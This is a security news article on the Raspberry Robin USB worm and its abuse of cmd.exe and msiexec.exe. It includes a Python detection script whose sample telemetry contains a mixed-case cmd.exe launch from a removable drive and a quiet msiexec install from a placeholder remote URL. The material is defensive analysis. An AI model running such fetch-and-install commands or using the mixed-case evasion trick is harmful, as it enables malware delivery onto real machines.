Raspberry Robin worm samples use Windows Installer to drop malware

New Windows malware with worm functions spreads using external USB drives

New malware samples using infected USB drives named Raspberry Robin worm

Red Canary researchers described new malware with worm capabilities that spreads through external drives and leverages Windows Installer.[1] Abusing the installer lets the malware reach QNAP-associated domains and download a malicious DLL onto the machine.[2] The researchers link the new malware to a cluster of malicious activity they call Raspberry Robin.[3] These operations were first observed in September 2021.

The worm was detected in the networks of various customers in the technology and manufacturing sectors. Raspberry Robin spreads to Windows systems when an infected USB drive containing a malicious .LNK file is connected to the machine. The worm then uses cmd.exe to launch the malicious file stored on the external drive.

These steps are followed by launching explorer.exe and msiexec.exe. These processes are used for external network communication with a rogue domain for command-and-control purposes and to download and install the DLL file. The malicious file is loaded and executed through a chain of legitimate Windows utilities, which helps it bypass User Account Control.[4]

Unknown objectives of attackers

The Raspberry Robin malware also uses various processes and files to find IP addresses associated with Tor nodes.[5] It is unknown how these attackers operate, and there is no information on the malware's end-stage tasks. Researchers speculate it could even be carried out offline, and they wonder what the particular attempts and possible objectives are:

We have several intelligence gaps around this cluster, including the operators’ objectives.

It is possible that the threat actors are financially motivated or install malicious DLLs to establish persistence on infected systems. Red Canary researchers analyzed these newly discovered samples[6] and how the malware behaves on infected systems. Many questions remain, because it is not clear how or where these external drives get infected.

Using legitimate Windows tools

The particular operations and execution are consistent with earlier Raspberry Robin worm detections. There are various worm-like capabilities and malicious activities. The malware uses mixed-case letters in its commands to evade detection. The secondary execution uses the Microsoft Standard Installer (msiexec.exe) to reach out to command-and-control servers hosted on compromised QNAP devices, with Tor exit nodes used as additional C2 infrastructure.

While the msiexec.exe command normally downloads legitimate installer packages and launches them, adversaries leverage it to deliver malicious files; here it is used to connect to the malicious domain. Persistence can be ensured by installing additional malicious DLL files and compromising more parts of the machine, including system files and folders.
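The execution chain described above (cmd.exe launching a file from the external drive, then msiexec.exe reaching out to a remote domain, with mixed-case commands used for evasion) lends itself to a simple process-creation detection. The following is an added example written for this article; it is not code from Red Canary or from the article's author. The process events, the placeholder domain, and the heuristic that treats any drive letter other than C: as "possibly removable media" are constructed assumptions; a production rule would use device or volume information rather than a drive letter.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-start record, modelled on Sysmon/EDR fields (constructed)."""
    parent_image: str
    image: str
    command_line: str


# Assumption for this example: paths on D:..Z: in a cmd.exe launch are treated as
# "possibly removable media". Real detection should consult the volume type.
NON_SYSTEM_DRIVE = re.compile(r"\b[d-z]:\\", re.IGNORECASE)
# msiexec being handed an http(s) URL means the package is fetched from the network.
URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased final path component, so 'C:\\Windows\\System32\\cmd.exe' -> 'cmd.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def has_mixed_case(token: str) -> bool:
    """True when a token mixes upper and lower case letters (e.g. 'cMd.eXe')."""
    letters = [c for c in token if c.isalpha()]
    return any(c.islower() for c in letters) and any(c.isupper() for c in letters)


def classify(ev: ProcessEvent) -> list:
    """Return the names of the behaviours this event matches (empty list if none)."""
    findings = []
    image = basename(ev.image)
    # Always compare against a case-normalised copy, otherwise mixed-case
    # command lines slip past naive string matching.
    lowered = ev.command_line.lower()
    parts = ev.command_line.split()
    first_token = parts[0] if parts else ""

    if image == "cmd.exe" and NON_SYSTEM_DRIVE.search(lowered):
        findings.append("cmd_launch_from_non_system_drive")
    if image == "msiexec.exe" and URL.search(lowered):
        findings.append("msiexec_remote_package")
    if image in ("cmd.exe", "msiexec.exe") and has_mixed_case(first_token):
        findings.append("mixed_case_command")
    return findings


def scan(events) -> list:
    """Return (index, findings) for every event that triggered at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        findings = classify(ev)
        if findings:
            hits.append((i, findings))
    return hits


# Constructed sample telemetry; file names and the domain are placeholders, not IoCs.
SAMPLE_EVENTS = [
    # Stage 1: cmd.exe run by explorer.exe to start a file on a non-system drive, mixed case.
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 r"cMd.eXe /r E:\constructed_sample.bat"),
    # Stage 2: msiexec.exe pointed at a remote package, again with mixed case.
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
                 r"MsIeXeC /q /i http://placeholder.invalid/package.msi"),
    # Benign: an ordinary cmd.exe invocation on the system drive.
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c dir C:\Users"),
    # Benign: a local MSI installed quietly by a service.
    ProcessEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\msiexec.exe",
                 r"msiexec.exe /i C:\Installers\app.msi /qn"),
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index].command_line, "->", ", ".join(findings))
```

The two malicious sample events each trigger two rules while the benign ones trigger none. The point worth carrying into a real ruleset is the normalisation step: the case-insensitive regexes and the lower-cased command line are what make the mixed-case evasion described in the article irrelevant to the match.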

Worms are typically used as attack vectors that deliver secondary malware such as ransomware, keyloggers, and other information-stealing programs. There are various malicious commands, however, that Raspberry Robin can execute on infected machines and networks.

Since there are many unanswered questions about the particular targets and goals of these malicious operations, the methods observed in these detected samples, or particular attack campaigns spreading in the wild, may become a bigger issue later on. As Red Canary researchers note, it is very important to inform the community and learn about the threat, so similar activities can be tracked and stopped before major consequences occur.

About the author
Gabriel E. Hall
Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.
